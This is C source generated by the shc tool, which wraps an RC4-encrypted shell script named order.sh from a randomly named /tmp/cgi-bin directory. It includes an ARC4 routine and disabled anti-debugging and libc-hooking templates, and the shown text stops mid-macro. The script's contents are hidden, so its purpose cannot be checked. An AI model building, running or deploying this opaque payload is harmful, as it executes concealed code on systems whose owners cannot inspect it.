#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/abdhkojdgjjaa12as23j891dgz1_TAC/order.sh 
#endif

static  char data [] = 
#define      rlax_z	1
#define      rlax	((&data[0]))
	"\354"
#define      chk1_z	22
#define      chk1	((&data[5]))
	"\230\023\217\132\014\175\106\346\125\231\120\344\016\113\075\061"
	"\075\000\000\135\140\266\046\275\252\026\017"
#define      lsto_z	1
#define      lsto	((&data[28]))
	"\220"
#define      tst2_z	19
#define      tst2	((&data[33]))
	"\031\225\237\070\370\061\310\212\342\275\311\267\043\256\016\345"
	"\064\260\204\234\352\034\243"
#define      msg2_z	19
#define      msg2	((&data[55]))
	"\220\327\127\326\222\204\132\176\170\203\343\142\176\307\203\126"
	"\335\102\133\131\115\031\001"
#define      chk2_z	19
#define      chk2	((&data[75]))
	"\361\233\302\304\317\317\252\366\175\024\307\164\072\326\277\165"
	"\200\072\205\230"
#define      opts_z	1
#define      opts	((&data[95]))
	"\103"
#define      tst1_z	22
#define      tst1	((&data[98]))
	"\216\354\364\022\076\316\252\013\176\340\220\243\153\377\312\034"
	"\260\353\171\232\002\026\101\356\040\235\133\220"
#define      date_z	1
#define      date	((&data[124]))
	"\351"
#define      shll_z	10
#define      shll	((&data[125]))
	"\273\127\306\034\344\152\171\210\006\044\332\214"
#define      text_z	3549
#define      text	((&data[678]))
	"\037\163\110\041\140\173\141\370\104\171\046\277\326\354\115\302"
	"\014\353\036\234\015\130\373\110\254\357\042\070\177\276\051\236"
	"\062\161\300\223\354\041\213\061\233\262\360\162\236\076\064\253"
	"\051\123\110\067\253\104\200\127\063\243\217\262\142\270\121\224"
	"\051\021\047\026\063\263\107\317\145\070\101\004\167\166\260\240"
	"\311\371\330\164\075\130\313\160\373\132\042\135\023\163\362\074"
	"\205\031\123\271\315\233\210\063\323\311\067\113\077\350\354\010"
	"\341\304\175\036\034\111\216\030\243\261\165\267\045\147\364\252"
	"\201\107\144\117\342\354\202\266\265\272\001\365\242\355\376\203"
	"\261\174\241\316\305\060\346\151\341\134\040\006\304\024\261\106"
	"\133\025\225\076\002\030\364\270\322\366\255\164\344\254\370\226"
	"\050\231\144\355\312\113\126\254\250\166\263\155\213\144\263\346"
	"\172\111\045\175\141\032\065\064\020\343\250\365\217\240\213\270"
	"\072\360\245\005\074\374\261\344\162\144\122\376\311\006\344\104"
	"\120\012\301\261\044\366\345\065\331\216\052\151\057\266\041\151"
	"\246\307\156\343\303\040\310\066\204\032\064\116\040\031\222\160"
	"\043\123\042\107\112\010\175\044\226\250\215\305\136\257\057\005"
	"\166\236\350\071\276\260\157\103\312\243\221\353\275\043\134\340"
	"\167\176\050\301\207\245\346\036\116\164\344\254\043\023\262\231"
	"\262\232\323\160\113\102\263\026\346\104\001\243\150\135\204\337"
	"\334\254\241\143\122\210\201\241\374\145\116\037\171\000\271\053"
	"\233\214\234\346\317\120\374\266\225\375\132\375\133\337\335\070"
	"\213\176\234\336\006\035\177\003\203\315\043\375\316\334\051\151"
	"\151\305\117\071\025\113\357\252\111\112\250\245\051\205\335\265"
	"\004\171\224\013\227\024\016\033\342\061\030\260\016\101\032\170"
	"\006\151\261\034\265\241\307\377\354\157\244\025\365\201\313\371"
	"\373\140\004\222\164\023\255\126\105\305\007\124\007\041\314\016"
	"\213\175\052\100\037\362\077\013\142\343\041\127\145\355\121\141"
	"\115\125\363\301\151\241\030\256\147\037\003\156\101\317\174\314"
	"\115\247\015\155\231\114\170\374\060\232\123\226\207\244\367\325"
	"\372\352\227\143\214\257\022\363\317\025\142\020\345\337\335\062"
	"\206\352\237\040\066\030\034\147\263\160\375\073\025\364\020\017"
	"\337\247\163\154\127\206\137\046\234\301\067\201\241\024\264\047"
	"\377\124\110\066\154\145\235\037\325\233\133\352\220\350\141\132"
	"\205\107\306\322\035\251\145\015\071\215\365\155\154\317\004\165"
	"\172\334\055\047\270\274\051\123\314\251\104\125\332\131\042\245"
	"\357\270\374\146\161\256\222\340\140\273\001\063\201\063\015\200"
	"\067\067\257\107\053\012\345\312\241\235\315\233\201\074\147\020"
	"\024\247\037\113\151\105\343\271\206\320\010\246\171\016\376\323"
	"\301\237\251\355\046\171\255\130\065\171\334\006\357\370\241\104"
	"\060\306\105\365\277\001\313\131\362\366\216\116\266\151\064\313"
	"\251\033\261\346\232\150\251\377\256\162\363\267\201\055\361\024"
	"\124\232\227\157\276\101\266\225\201\101\175\164\152\204\003\270"
	"\124\251\111\074\027\035\343\317\053\227\260\365\013\056\243\310"
	"\204\144\241\000\143\322\201\106\204\250\047\105\343\265\067\271"
	"\047\002\232\307\346\362\310\304\017\154\261\037\345\066\131\167"
	"\375\072\214\317\152\377\064\154\034\127\243\357\160\076\174\127"
	"\247\377\356\141\151\152\206\057\335\265\165\026\371\053\333\363"
	"\274\233\152\120\001\313\106\115\164\272\121\060\300\007\070\333"
	"\107\326\016\252\317\212\242\220\100\277\375\146\321\236\244\267"
	"\132\135\372\231\305\260\242\171\236\361\061\233\136\024\221\303"
	"\212\174\134\134\060\077\075\373\353\143\077\200\253\053\161\273"
	"\230\075\057\171\361\165\051\215\005\150\370\075\042\343\271\347"
	"\225\321\142\051\175\266\260\132\171\206\372\024\104\002\273\036"
	"\324\334\300\203\315\212\225\100\244\353\314\347\237\230\343\157"
	"\023\134\274\346\004\031\362\210\135\224\215\357\243\234\105\123"
	"\133\007\052\023\315\025\243\101\244\350\265\161\062\346\277\125"
	"\265\270\303\202\261\221\115\006\023\340\173\124\036\215\304\166"
	"\037\363\127\110\161\072\000\333\377\256\157\151\201\377\072\275"
	"\374\221\317\270\364\314\323\317\370\323\146\161\021\271\371\216"
	"\240\300\376\224\000\124\112\044\154\205\320\277\015\302\322\367"
	"\041\144\347\250\210\223\304\273\057\062\071\306\063\151\340\025"
	"\373\342\062\267\017\160\305\055\130\113\250\040\050\273\343\144"
	"\001\271\056\145\042\011\175\225\113\021\141\121\152\366\154\341"
	"\377\037\062\020\053\333\273\111\172\201\114\070\025\027\261\372"
	"\217\341\372\111\243\337\054\151\241\153\061\305\036\275\177\052"
	"\317\174\342\143\300\047\143\126\031\150\117\371\261\032\377\141"
	"\355\217\026\225\130\120\257\100\341\126\356\134\003\036\107\125"
	"\310\225\111\050\100\311\264\367\141\376\136\153\352\214\067\136"
	"\074\357\101\173\116\303\147\046\157\371\254\347\255\174\214\064"
	"\017\326\367\336\176\274\070\172\220\074\066\142\024\054\316\145"
	"\211\320\126\307\063\070\321\371\134\341\246\154\236\002\261\131"
	"\031\274\151\145\202\327\207\333\250\112\001\014\250\035\012\076"
	"\352\363\007\327\002\355\361\031\303\035\142\135\344\203\064\312"
	"\166\304\022\350\052\056\154\347\365\117\321\031\047\223\055\154"
	"\072\363\342\235\102\302\056\107\362\353\324\205\264\014\157\254"
	"\371\214\310\041\167\056\374\276\002\007\024\200\347\131\267\217"
	"\323\240\244\100\017\163\330\072\210\114\356\336\376\147\110\254"
	"\013\214\252\212\334\370\136\161\034\050\122\310\143\356\072\270"
	"\070\246\105\205\177\102\370\317\123\353\015\071\031\132\160\273"
	"\147\341\173\264\052\321\152\140\153\103\075\207\136\165\270\262"
	"\210\116\017\042\104\277\156\034\045\254\112\064\212\237\124\003"
	"\317\336\331\352\247\110\022\056\005\022\114\071\300\270\340\117"
	"\215\361\026\071\267\335\012\056\225\341\164\274\310\141\025\325"
	"\323\332\037\033\213\044\032\246\307\121\233\132\274\253\246\321"
	"\366\321\126\214\370\375\307\002\173\205\156\053\352\350\154\222"
	"\260\025\055\251\377\311\051\302\166\166\113\160\125\345\010\253"
	"\300\160\004\235\042\211\166\131\042\262\052\315\136\331\203\125"
	"\327\353\020\351\067\260\214\231\113\171\025\231\360\173\201\311"
	"\152\054\355\126\272\326\151\244\054\163\077\255\257\062\375\161"
	"\164\004\150\336\141\036\124\240\303\353\241\166\037\006\143\312"
	"\042\121\252\174\140\124\262\173\150\327\001\274\141\213\136\104"
	"\327\021\166\067\045\332\303\126\310\217\007\200\023\306\041\271"
	"\255\103\015\065\201\041\122\376\144\000\232\040\304\342\126\000"
	"\364\312\060\275\244\241\132\175\272\034\202\373\047\200\152\141"
	"\307\306\063\234\260\015\064\156\365\041\274\271\306\011\211\334"
	"\063\327\074\161\143\155\172\345\274\027\041\015\355\351\140\215"
	"\104\177\106\331\047\327\072\166\370\161\061\303\306\143\067\133"
	"\207\372\014\020\102\170\073\114\357\115\356\045\161\260\237\141"
	"\127\127\131\244\350\350\353\355\341\200\154\033\364\130\024\127"
	"\112\213\140\224\047\326\351\016\173\263\353\103\362\347\350\005"
	"\114\220\124\350\216\066\153\063\361\101\261\270\131\052\275\026"
	"\243\254\313\111\033\353\070\113\222\012\245\220\126\110\234\040"
	"\026\324\214\127\344\046\367\271\130\226\252\375\133\241\005\216"
	"\171\151\325\373\053\344\366\332\002\375\112\341\044\014\333\113"
	"\247\303\002\360\127\006\307\374\227\234\025\360\313\256\221\051"
	"\354\174\270\065\147\022\376\251\363\017\116\265\305\310\200\157"
	"\323\167\306\232\265\021\157\357\126\300\273\274\213\257\070\167"
	"\101\072\274\352\205\305\275\021\335\155\302\152\005\135\036\266"
	"\147\062\221\327\312\214\236\053\120\064\142\157\011\213\356\301"
	"\330\012\104\156\212\114\227\366\317\316\317\010\202\356\162\234"
	"\262\242\044\234\023\245\110\321\106\125\325\135\303\026\247\304"
	"\233\354\321\314\326\203\253\276\032\157\333\021\313\231\060\246"
	"\204\134\336\330\147\073\347\365\374\340\256\132\164\030\163\116"
	"\356\246\336\147\136\306\245\043\201\200\330\310\241\002\355\056"
	"\101\167\133\204\033\007\356\367\036\142\112\214\145\002\011\252"
	"\201\251\373\007\214\173\001\117\347\202\377\024\103\234\100\065"
	"\004\022\073\202\364\163\253\156\054\222\156\077\256\216\102\201"
	"\127\140\254\127\100\224\011\217\201\157\305\223\203\145\267\002"
	"\317\354\333\074\354\330\256\307\053\063\200\351\156\310\075\374"
	"\120\353\147\060\367\122\065\211\004\242\313\307\355\176\125\207"
	"\163\077\155\243\215\026\261\162\157\154\005\213\216\207\333\176"
	"\271\103\262\066\072\335\021\201\363\171\377\145\053\102\142\271"
	"\111\254\221\266\310\042\223\232\171\301\076\352\344\047\140\242"
	"\102\004\223\226\374\171\300\146\143\042\362\130\065\155\360\272"
	"\264\314\040\144\074\314\246\062\215\230\167\035\170\133\123\072"
	"\115\363\161\055\156\166\225\010\205\017\030\113\246\054\345\255"
	"\132\342\033\330\340\060\247\144\366\254\250\200\067\322\337\134"
	"\253\127\237\311\113\031\104\007\251\303\046\245\112\141\147\000"
	"\053\055\354\311\305\342\214\116\347\012\217\213\214\307\375\114"
	"\153\315\222\273\070\205\225\303\364\240\310\324\244\005\215\270"
	"\343\126\053\053\154\107\327\225\242\311\163\236\070\243\310\246"
	"\110\122\330\067\106\115\030\212\363\126\137\265\141\206\140\337"
	"\061\162\316\073\013\246\136\125\206\324\054\137\211\115\176\071"
	"\216\202\102\050\344\131\032\326\076\313\344\377\115\024\066\156"
	"\227\257\356\334\354\063\127\215\046\363\307\274\132\363\114\133"
	"\036\030\274\255\003\013\322\140\171\067\155\076\265\217\077\102"
	"\304\026\160\211\372\233\350\330\214\314\363\016\356\376\117\112"
	"\231\004\056\315\141\225\025\042\362\222\304\160\344\145\057\350"
	"\157\115\145\234\032\152\162\121\351\366\367\234\220\375\241\044"
	"\107\007\146\115\234\006\312\223\170\031\135\342\154\307\105\055"
	"\251\010\051\026\172\066\202\002\374\073\021\244\220\302\073\060"
	"\221\273\017\314\333\012\171\257\044\314\032\253\167\204\246\170"
	"\120\041\361\304\075\051\022\124\145\333\202\257\210\073\153\204"
	"\265\132\121\144\272\224\051\361\326\231\156\056\047\321\327\376"
	"\033\242\157\102\305\220\300\375\043\142\347\130\041\020\366\225"
	"\327\301\173\120\150\336\222\047\320\266\351\230\372\102\215\163"
	"\114\057\022\136\153\067\153\272\247\273\052\064\011\076\344\327"
	"\045\314\306\227\115\214\163\072\217\363\131\327\104\303\077\116"
	"\317\126\136\361\253\104\143\153\261\201\110\010\227\241\215\207"
	"\165\236\160\356\122\246\164\064\110\356\332\326\146\164\350\031"
	"\320\271\201\141\003\102\305\206\144\224\003\065\273\105\143\331"
	"\065\004\366\344\113\150\247\013\235\046\311\213\027\247\170\257"
	"\217\170\121\364\117\121\204\167\232\206\221\374\007\324\353\226"
	"\344\041\323\104\066\374\036\163\066\264\360\217\200\257\125\103"
	"\203\300\232\071\047\370\327\222\201\366\170\311\013\313\036\317"
	"\364\242\174\371\335\071\234\303\330\067\013\024\045\231\303\072"
	"\104\037\346\241\375\151\077\170\377\330\220\327\352\311\120\242"
	"\247\125\160\006\042\013\112\370\200\216\154\005\141\254\341\221"
	"\311\370\330\261\343\275\234\323\331\154\047\311\042\032\125\047"
	"\144\206\300\154\014\011\176\273\144\112\074\240\161\341\165\233"
	"\227\262\156\211\302\250\011\303\014\353\167\326\047\373\342\014"
	"\163\122\053\052\034\001\167\314\032\337\107\253\224\121\110\320"
	"\036\356\166\235\033\176\357\023\005\015\143\330\346\024\070\306"
	"\061\254\361\001\333\007\045\231\260\256\204\077\205\154\046\120"
	"\360\072\272\016\043\215\116\325\006\116\134\341\237\276\372\345"
	"\177\115\312\267\361\075\275\163\175\022\251\264\004\214\302\334"
	"\034\376\274\244\237\005\057\277\234\173\166\127\030\007\206\232"
	"\377\366\273\202\105\065\177\124\074\222\150\247\326\045\257\135"
	"\104\310\256\161\160\322\002\036\015\241\111\377\054\037\055\215"
	"\263\163\032\362\264\140\006\304\367\277\320\004\033\256\371\111"
	"\202\050\274\075\006\342\222\220\212\055\073\202\002\034\324\141"
	"\270\070\074\064\335\007\227\236\067\125\043\202\114\267\072\274"
	"\355\344\102\045\374\201\305\004\316\050\331\113\216\250\272\214"
	"\213\240\200\005\175\334\220\273\025\326\107\071\075\207\246\000"
	"\041\321\220\074\230\327\360\174\363\234\202\027\315\334\043\005"
	"\022\122\237\027\173\330\371\225\040\275\376\373\266\147\063\107"
	"\002\324\324\061\041\262\013\277\030\145\206\157\373\341\244\317"
	"\120\035\077\132\145\355\023\160\241\132\324\246\343\346\233\160"
	"\305\362\003\016\371\213\277\067\177\330\143\134\272\134\266\150"
	"\223\166\006\154\005\057\026\215\242\077\126\007\141\076\251\273"
	"\333\165\077\366\204\174\203\322\154\065\335\250\023\077\362\061"
	"\066\377\162\250\134\057\330\137\061\205\007\331\002\137\077\217"
	"\100\030\053\112\043\211\026\076\156\351\263\141\212\275\111\022"
	"\031\014\262\015\302\325\053\151\207\140\060\236\331\051\206\002"
	"\063\343\335\166\365\327\263\010\170\135\206\271\147\237\077\050"
	"\117\103\167\070\164\260\015\361\346\337\046\210\307\104\062\037"
	"\060\327\011\347\057\265\303\072\303\045\316\342\232\357\367\361"
	"\307\335\155\264\120\102\207\220\152\016\137\324\220\106\262\363"
	"\115\372\340\022\327\146\225\123\370\253\200\051\072\231\204\105"
	"\120\135\003\314\111\350\377\164\144\060\300\055\330\107\364\307"
	"\304\275\122\256\050\266\250\234\333\154\132\160\050\046\204\122"
	"\064\033\266\237\234\320\141\106\025\142\300\013\307\245\333\065"
	"\036\220\220\100\206\247\044\205\225\166\044\043\203\353\014\253"
	"\065\026\114\235\261\265\205\053\320\333\312\011\134\217\031\257"
	"\350\356\071\122\322\035\211\020\105\321\366\363\134\115\065\040"
	"\000\145\230\143\216\353\352\000\303\156\274\112\000\316\154\021"
	"\011\207\061\305\355\002\113\377\154\352\376\010\070\067\272\270"
	"\170\203\147\014\325\175\150\037\357\243\013\020\373\044\022\137"
	"\012\172\166\074\265\152\164\242\007\035\156\230\056\261\225\227"
	"\150\224\320\055\204\175\375\144\371\017\112\201\213\273\012\162"
	"\152\244\256\363\063\167\136\315\205\042\162\375\020\167\156\257"
	"\026\013\132\232\336\374\202\102\124\303\073\101\210\325\053\164"
	"\154\030\112\116\154\303\307\226\325\111\262\124\140\167\006\252"
	"\133\334\306\272\053\045\043\212\307\106\065\113\005\344\360\142"
	"\353\157\360\144\243\141\201\070\322\156\224\124\201\343\151\265"
	"\123\135\017\176\366\044\127\063\045\302\301\277\041\127\122\062"
	"\271\056\221\277\144\364\131\062\046\024\076\043\150\117\151\122"
	"\050\111\144\012\120\073\003\270\365\006\317\330\105\373\037\312"
	"\246\313\124\315\035\274\277\321\077\354\161\223\250\133\362\007"
	"\134\217\301\054\323\235\271\361\252\101\135\035\117\350\131\341"
	"\240\003\316\057\161\324\126\310\314\364\356\005\243\372\212\147"
	"\252\362\276\061\124\321\232\376\353\222\060\171\013\257\156\232"
	"\132\306\276\166\065\322\327\340\251\274\321\173\200\163\216\127"
	"\172\176\052\344\065\252\062\323\247\223\266\014\305\007\273\146"
	"\177\001\326\227\010\247\017\257\075\342\011\076\260\311\371\272"
	"\373\170\337\343\367\067\101\102\351\001\274\034\345\212\040\075"
	"\304\071\362\175\300\222\044\261\025\206\105\132\254\140\067\320"
	"\332\321\337\276\313\110\205\060\276\313\222\150\153\012\274\300"
	"\211\023\033\272\207\104\302\032\232\340\047\335\003\217\262\155"
	"\327\021\220\261\241\327\170\242\135\177\350\151\376\312\366\076"
	"\343\245\027\227\321\365\010\130\010\070\244\120\221\144\140\032"
	"\232\304\143\363\066\113\243\010\230\374\010\372\350\376\247\033"
	"\212\253\241\121\221\222\156\270\216\265\146\171\111\002\211\071"
	"\172\174\340\127\000\061\367\335\142\055\064\216\342\314\000\131"
	"\314\362\366\211\053\361\307\141\275\056\265\032\342\012\302\200"
	"\032\253\366\040\032\240\056\376\045\335\232\243\302\374\242\064"
	"\347\320\041\376\034\153\204\326\144\316\017\102\131\103\260\034"
	"\377\206\000\112\233\310\213\231\174\046\044\133\175\322\143\127"
	"\362\145\132\274\300\305\014\166\214\160\154\246\327\107\364\172"
	"\130\174\140\073\377\231\337\145\062\024\077\371\357\172\164\345"
	"\017\247\231\043\370\233\262\207\360\350\341\265\350\147\331\002"
	"\223\357\307\356\107\016\340\243\215\067\064\006\362\052\150\077"
	"\077\122\002\272\201\250\124\372\337\262\241\045\302\374\136\140"
	"\056\215\213\201\361\165\217\324\111\257\121\243\224\134\327\172"
	"\134\146\211\016\010\271\163\050\101\221\365\016\343\140\276\146"
	"\203\045\077\351\346\045\356\022\237\156\020\302\211\210\007\346"
	"\370\112\153\341\266\132\005\034\205\235\234\307\330\261\071\164"
	"\315\017\145\112\172\220\102\013\211\246\073\336\232\013\253\313"
	"\103\124\303\376\110\015\235\301\015\201\334\260\251\205\372\006"
	"\134\247\241\055\313\237\210\102\230\305\024\226\144\043\152\051"
	"\242\174\035\305\173\166\075\155\123\074\111\040\163\005\006\054"
	"\151\101\232\236\240\230\344\144\357\161\355\364\135\150\365\021"
	"\100\031\327\152\241\350\064\173\366\061\043\145\013\246\150\241"
	"\120\350\341\234\201\200\321\112\172\061\227\135\177\167\077\327"
	"\254\225\200\274\005\154\034\021\347\305\317\301\233\215\217\267"
	"\357\237\124\125\343\201\343\337\176\242\171\273\257\144\374\162"
	"\240\260\264\105\210\100\216\156\214\354\370\031\166\154\005\326"
	"\261\330\253\174\367\045\010\131\307\274\247\220\147\306\065\001"
	"\051\053\265\067\132\116\305\156\115\251\230\353\025\034\267\311"
	"\174\223\357\265\372\030\270\067\304\150\231\003\115\354\363\000"
	"\256\013\212\106\344\231\334\261\143\053\345\335\074\235\245\344"
	"\060\127\312\071\353\074\225\001\050\223\016\356\176\004\106\311"
	"\032\262\230\342\151\325\134\363\006\330\254\233\077\301\041\321"
	"\013\374\104\363\106\341\067\034\124\027\257\146\023\335\336\144"
	"\072\316\226\100\213\035\272\104\206\341\153\372\157\023\155\333"
	"\152\364\073\220\220\375\310\022\236\334\306\306\333\032\017\021"
	"\206\164\257\246\112\112\001\065\332\155\057\112\200\235\046\353"
	"\221\141\174\042\137\104\064\375\041\372\304\375\025\323\017\234"
	"\107\276\102\222\011\104\307\344\262\367\056\063\224\125\036\046"
	"\266\232\110\026\336\175\023\000\167\330\375\214\253\014\050\363"
	"\313\153\205\325\260\114\271\142\103\350\225\330\075\264\376\364"
	"\116\107\012\055\304\036\055\074\366\053\311\241\070\362\225\003"
	"\136\032\331\016\147\222\161\252\172\007\203\267\273\202\253\012"
	"\311\266\070\216\324\146\313\312\221\225\154\311\207\001\315\345"
	"\034\246\364\203\071\146\056\263\155\261\153\051\063\027\063\375"
	"\315\154\214\242\322\127\155\144\354\331\055\164\333\373\132\367"
	"\242\116\173\334\264\251\220\042\132\373\113\216\023\177\213\341"
	"\354\027\203\276\157\360\042\134\312\120\320\246\114\052\236\357"
	"\171\031\313\055\302\133\120\035\127\234\254\152\033\067\114\007"
	"\117\317\306\277\300\350\033\213\071\353\061\205\026\320\164\217"
	"\352\077\275\254\233\015\312\362\251\166\135\305\256\252\315\376"
	"\172\223\275\072\174\331\306\265\304\370\073\333\310\257\152\262"
	"\357\047\137\213\065\052\176\336\241\334\244\117\206\161\116\000"
	"\005\013\073\201\344\001\067\251\372\162\204\303\042\357\165\021"
	"\027\325\235\114\000\033\053\241\367\317\361\175\100\077\176\106"
	"\113\271\307\057\273\376\331\265\160\136\170\223\116\356\244\145"
	"\303\101\262\303\135\335\145\124\255\126\322\356\225\120\064\340"
	"\011\374\020\304\372\352\172\153\110\362\376\227\341\243\374\244"
	"\345\257\150\102\215\315\227\073\043\151\051\271\271\136\232\302"
	"\132\252\207\124\224\001\300\335\364\277\164\325\142\161\172\110"
	"\041\342\213\256\260\042\351\324\213\023\215\104\161\047\007\313"
	"\322\216\040\147\220\341\104\204\240\271\132\003\053\324\113\114"
	"\267\327\373\147\371\344\074\204\370\312\311\151\362\320\064\304"
	"\137\125\054\357\066\161\163\327\052\315\332\126\242\046\243\131"
	"\375\236\301\367\203\375\173\173\307\105\344\272\025\031\177\164"
	"\157\253\143\245\034\327\174\107\245\127\235\107\176\100\241\173"
	"\337\142\162\142\140\356\335\050\063\302\342\111\333\141\275\112"
	"\014\041\360\051\370\155\160\236\304\016\346\102\117\207\276\056"
	"\351\061\220\111\040\155\161\123\060\124\234\013\265\132\126\302"
	"\173\107\354\164\264\134\022\171\153\370\274\272\177\173\350\151"
	"\255\170\263\315\346\044\040\026\171\275\042\056\027\171\361\223"
	"\300\335\007\165\072\032\357\245\023\254\137\223\047\107\374\324"
	"\300\260\241\246\325\302\275\116\200\337\175\227\130\156\053\030"
	"\114\062\216\206\115\175\053\140\051\213\363\121\323\360\045\223"
	"\240\307\071\165\212\366\304\012\326\101\242\056\257\315\107\373"
	"\000\325\202\115\123\255\256\175\071\242\316\014\223\363\237\063"
	"\273\331\251\105\320\155\117\246\257\361\325\136\276\034\132\276"
	"\362\334\014\105\212\272\302\303\135\221\317\360\204\156\044\100"
	"\107\315\205\027\073\324\276\352\306\223\111\204\257\243\103\242"
	"\200\120\350\012\012\253\315\147\074\234\130\301\013\174\001\123"
	"\111\206\153\205\133\051\160\041\275\271\246\154\135\352\017\335"
	"\072\367\350\105\243\265\255\337\122\005\240\135\201\242\261\313"
	"\051\034\121\204\106\302\246\003\174\115\160\331\070\177\267\162"
	"\167\237\270\032\125\146\372\247\153\233\005\355\075\267\271\146"
	"\323\013\353\032\315\222\035\111\337\215\043\027\015\332\212\205"
	"\172\103\237\317\251\232\167\025\065\175\002\162\065\274\331\010"
	"\307\304\042\224\126\100\335\066\316\000\116\333\333"
#define      pswd_z	256
#define      pswd	((&data[5086]))
	"\034\000\045\305\232\235\332\317\033\335\102\120\231\033\131\140"
	"\340\174\364\067\274\321\156\212\343\370\273\272\110\164\005\267"
	"\013\076\372\032\142\102\011\212\202\227\322\360\267\027\014\346"
	"\056\056\335\164\356\146\215\322\137\111\214\250\276\222\137\311"
	"\321\132\343\064\234\355\276\037\204\220\020\074\250\034\042\326"
	"\113\377\113\071\146\330\014\305\042\231\156\340\053\316\251\374"
	"\050\215\060\305\172\357\345\376\177\365\073\050\022\135\377\135"
	"\135\112\227\303\043\243\211\105\074\370\046\150\306\317\145\356"
	"\134\225\264\327\205\231\326\005\217\021\055\241\156\054\376\313"
	"\166\226\217\231\072\031\337\167\021\005\337\327\325\104\306\062"
	"\332\172\011\137\024\337\144\243\360\222\104\136\277\103\052\066"
	"\332\271\320\024\323\257\213\344\265\153\274\212\260\203\274\212"
	"\375\305\352\021\245\117\265\225\342\371\364\241\075\036\327\027"
	"\330\247\053\254\127\267\221\014\042\115\226\323\320\123\136\316"
	"\031\110\340\276\230\225\124\172\216\110\034\313\147\364\343\100"
	"\233\016\354\363\305\175\377\350\313\226\273\234\351\031\152\003"
	"\142\112\301\373\340\025\166\157\136\222\073\306\206\036\007\042"
	"\054\363\025\362\161\025\333\075\322\274\146\255\225\306\003\261"
	"\307\050\167\141\306\121\061\341\056\163\061\310\217"
#define      msg1_z	65
#define      msg1	((&data[5365]))
	"\007\035\013\072\304\322\022\247\224\365\301\001\017\320\046\034"
	"\057\103\202\113\304\136\354\115\235\336\060\350\366\025\260\303"
	"\062\142\217\273\261\305\127\206\117\043\247\365\200\233\056\361"
	"\165\352\144\277\005\062\034\334\220\046\221\054\241\324\146\121"
	"\323\212\150\247\303\356\025\116\301\322"
#define      inlo_z	3
#define      inlo	((&data[5437]))
	"\225\115\146"
#define      xecc_z	15
#define      xecc	((&data[5441]))
	"\101\276\353\055\174\344\216\037\023\007\025\136\164\016\243\004"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
